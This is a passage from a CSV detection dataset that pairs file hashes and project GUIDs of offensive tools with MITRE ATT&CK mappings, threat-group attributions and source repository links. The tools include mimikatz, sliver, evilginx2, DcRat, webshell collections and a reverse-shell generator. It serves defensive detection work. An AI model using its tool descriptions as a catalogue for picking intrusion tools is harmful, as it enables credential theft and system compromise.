fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32279" "*a1e4912be7e7d1db5247a326fec21f847d254d87ed253ad2b9de085a66d5eb13*",".{0,1000}a1e4912be7e7d1db5247a326fec21f847d254d87ed253ad2b9de085a66d5eb13.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#filehash","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","32280" "*a1eae60e964d13208a3305dcaf3d24ab8137ff67baf575200fd8d67e92c0f2ae*",".{0,1000}a1eae60e964d13208a3305dcaf3d24ab8137ff67baf575200fd8d67e92c0f2ae.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32281" 
"*A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0*",".{0,1000}A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","32282" "*a1f112b27e1d963f44316f29f6656a85221e6138afcb90f5a6bbcea6525b69fc*",".{0,1000}a1f112b27e1d963f44316f29f6656a85221e6138afcb90f5a6bbcea6525b69fc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32283" "*A1F54816-3FBA-4A71-9D26-D31C6BE9CF01*",".{0,1000}A1F54816\-3FBA\-4A71\-9D26\-D31C6BE9CF01.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","32285" "*a1f8ecfc8b1e67d081057d151ae638191b5b39f929c1f0447af69e23476bca1c*",".{0,1000}a1f8ecfc8b1e67d081057d151ae638191b5b39f929c1f0447af69e23476bca1c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","32286" 
"*a1fd85d3ba3ffa17a7a3b7b484563f528746ef482ca052d0499072c5e0327308*",".{0,1000}a1fd85d3ba3ffa17a7a3b7b484563f528746ef482ca052d0499072c5e0327308.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32289" "*a201bc3c2d47775b39cd90b32eb390e7*",".{0,1000}a201bc3c2d47775b39cd90b32eb390e7.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","32292" "*a2041f36d6034a45beb519ff59fba80d6e7f6d0225b4123008d0dced4d8d6d87*",".{0,1000}a2041f36d6034a45beb519ff59fba80d6e7f6d0225b4123008d0dced4d8d6d87.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32294" "*a2090197c5cf82c6799cf7f8f7f1d0d42436882c67814b70d458c4ae8e9c7e32*",".{0,1000}a2090197c5cf82c6799cf7f8f7f1d0d42436882c67814b70d458c4ae8e9c7e32.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32295" "*a20a99c4f1693911d793608704b7b50c69fea98c091ff2cfd936227374d3d83d*",".{0,1000}a20a99c4f1693911d793608704b7b50c69fea98c091ff2cfd936227374d3d83d.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","32296" "*a20e531b0117f484e0b2aa0debccc8edc597fbaf43578cc1c862eb98fb6a849d*",".{0,1000}a20e531b0117f484e0b2aa0debccc8edc597fbaf43578cc1c862eb98fb6a849d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32298" "*A2107C86-7CB5-45EE-89E8-1BC7261F7762*",".{0,1000}A2107C86\-7CB5\-45EE\-89E8\-1BC7261F7762.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level 
rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","32300" "*A220F564-41CB-46F5-9938-FEFD87819771*",".{0,1000}A220F564\-41CB\-46F5\-9938\-FEFD87819771.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","#GUIDproject","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","32303" "*a222df9c30fc7adacb7553a9899a3512e18b9e8d2b735bcd5210c800ba99b243*",".{0,1000}a222df9c30fc7adacb7553a9899a3512e18b9e8d2b735bcd5210c800ba99b243.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32304" "*a2358b98f2f8c2d58f2314043c9207dae176eea11260788d7a2d67cb82f39cc9*",".{0,1000}a2358b98f2f8c2d58f2314043c9207dae176eea11260788d7a2d67cb82f39cc9.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","32309" "*a236a082af48fe2e9a9a0ca59bfc1804e67b1c31755d26cbac7e6ca167a66fe4*",".{0,1000}a236a082af48fe2e9a9a0ca59bfc1804e67b1c31755d26cbac7e6ca167a66fe4.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","32310" "*a239aa784fa1dfdd3bb50c20c21b03dbc3ce364f940bec5d23faca835c2e5417*",".{0,1000}a239aa784fa1dfdd3bb50c20c21b03dbc3ce364f940bec5d23faca835c2e5417.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32312" "*a243a5df3e04b3a555b3f506b36037d0093a22c0b8e5842a8890bc4610855cdb*",".{0,1000}a243a5df3e04b3a555b3f506b36037d0093a22c0b8e5842a8890bc4610855cdb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32313" "*a243b7196d9fb7977aa29002a42977d87b1141857421c8b5a4b8b3ef3a5cb59b*",".{0,1000}a243b7196d9fb7977aa29002a42977d87b1141857421c8b5a4b8b3ef3a5cb59b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32314" "*a243f92822a73f788a7ea29fedbbaf39ce10b70535d21eb8a9ad86a68109ffb8*",".{0,1000}a243f92822a73f788a7ea29fedbbaf39ce10b70535d21eb8a9ad86a68109ffb8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32315" "*a24bd6262d411361edc53e8524b6ed92bccc046af52ac1218f51c9f810109796*",".{0,1000}a24bd6262d411361edc53e8524b6ed92bccc046af52ac1218f51c9f810109796.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32317" "*a25b9df135c7a09348526cb0ffdd1e486b7cc6c16df811d83ef1d5402ec1f8ad*",".{0,1000}a25b9df135c7a09348526cb0ffdd1e486b7cc6c16df811d83ef1d5402ec1f8ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32320" "*a25c5e7baec3573c2a78872808c709d702714f3a11e57d06b62244c3eca2a834*",".{0,1000}a25c5e7baec3573c2a78872808c709d702714f3a11e57d06b62244c3eca2a834.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","32321" "*a260d61fe0bc252fa2f2ea9abba5db96cf21bb8d786fcaf973c5e9cdf9af63c8*",".{0,1000}a260d61fe0bc252fa2f2ea9abba5db96cf21bb8d786fcaf973c5e9cdf9af63c8.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32322" 
"*a27020a4b91eee6301ac4b67eb12224436692ff4e8bedcfdbe8f31ffb0f4da91*",".{0,1000}a27020a4b91eee6301ac4b67eb12224436692ff4e8bedcfdbe8f31ffb0f4da91.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32326" "*a276ed1739c3380b2e918da23ddac04cc117e17e08dac219bb4f82783f9f9850*",".{0,1000}a276ed1739c3380b2e918da23ddac04cc117e17e08dac219bb4f82783f9f9850.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#filehash","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","32328" "*A2791A8889432638BC1ADB213A1CF50E9B07439442D77D6057C635778789CC82*",".{0,1000}A2791A8889432638BC1ADB213A1CF50E9B07439442D77D6057C635778789CC82.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32329" "*a27fce6d1589930899c893f6026891b4b7cd9e0f42322985299a3ba523a3e40f*",".{0,1000}a27fce6d1589930899c893f6026891b4b7cd9e0f42322985299a3ba523a3e40f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of 
outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32332" "*a280f960cb4fc01ec2dbb4fe56f17122523878a9ece3713868244fbd95e7d7e6*",".{0,1000}a280f960cb4fc01ec2dbb4fe56f17122523878a9ece3713868244fbd95e7d7e6.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#filehash","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","32333" "*a285f5f5627c483cdc0a2d2110ea1840ae221bcbf836a186822835653db93a71*",".{0,1000}a285f5f5627c483cdc0a2d2110ea1840ae221bcbf836a186822835653db93a71.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","32335" "*a287b6d1ff18dab39efbf0b4c6937507f388923cbb47e66d72938aa87912bc20*",".{0,1000}a287b6d1ff18dab39efbf0b4c6937507f388923cbb47e66d72938aa87912bc20.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","32336" "*a28d627deaf54fdabd986ea28160bff5c469f53dc5be72ddd58b3bff89ab1e89*",".{0,1000}a28d627deaf54fdabd986ea28160bff5c469f53dc5be72ddd58b3bff89ab1e89.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to 
search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","32337" "*a29c6f59fa8fc621166577447b14cbb8b4c0c4e29eb02427d359beade9148033*",".{0,1000}a29c6f59fa8fc621166577447b14cbb8b4c0c4e29eb02427d359beade9148033.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32338" "*a2a63c273505a6ee6580bf6d77a7c510f6fba4496e04efd6656f920b477dad69*",".{0,1000}a2a63c273505a6ee6580bf6d77a7c510f6fba4496e04efd6656f920b477dad69.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32341" "*a2a8f773388c06df995500e1d74e8855b11771b21474af4efad67362cc32119e*",".{0,1000}a2a8f773388c06df995500e1d74e8855b11771b21474af4efad67362cc32119e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - 
Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32343" "*a2a8f773388c06df995500e1d74e8855b11771b21474af4efad67362cc32119e*",".{0,1000}a2a8f773388c06df995500e1d74e8855b11771b21474af4efad67362cc32119e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32344" 
"*a2b03c173484ada281f36aeabeedc6ced6d4289d4c204aa69b8a65c3f45037db*",".{0,1000}a2b03c173484ada281f36aeabeedc6ced6d4289d4c204aa69b8a65c3f45037db.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","32346" "*a2b0e31afa53dfc587fa9e80abddbb6bb01d1050d5e68359f6f298a84fa6625e*",".{0,1000}a2b0e31afa53dfc587fa9e80abddbb6bb01d1050d5e68359f6f298a84fa6625e.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","32347" "*a2b402f23bed2afebdda5ca21f7bc705a021ad86a35676cd3b55c7aa56406e0f*",".{0,1000}a2b402f23bed2afebdda5ca21f7bc705a021ad86a35676cd3b55c7aa56406e0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32348" "*a2ba6578e740b1a7369d79eb4087f99a3c5ab082def76bb7510e14fff041283b*",".{0,1000}a2ba6578e740b1a7369d79eb4087f99a3c5ab082def76bb7510e14fff041283b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32349" "*a2be75dd7462fbb4753ae380a987351c51d6cd41ba5cc41f08242feeec1df06f*",".{0,1000}a2be75dd7462fbb4753ae380a987351c51d6cd41ba5cc41f08242feeec1df06f.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","#filehash","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","32350" "*a2c2db4fb0e2ec86fbdda64d1fdf5a084d036073ffd366c1c56336c4c5c95bf1*",".{0,1000}a2c2db4fb0e2ec86fbdda64d1fdf5a084d036073ffd366c1c56336c4c5c95bf1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32351" "*a2cc2a768feea8a8a34cc907067758bf7560aa7719deddd676d8a5d521dae63e*",".{0,1000}a2cc2a768feea8a8a34cc907067758bf7560aa7719deddd676d8a5d521dae63e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32353" "*a2d412b6feac0c34d148158e5791940e5060bf4b9e6db33e7c444bf715553dc6*",".{0,1000}a2d412b6feac0c34d148158e5791940e5060bf4b9e6db33e7c444bf715553dc6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform 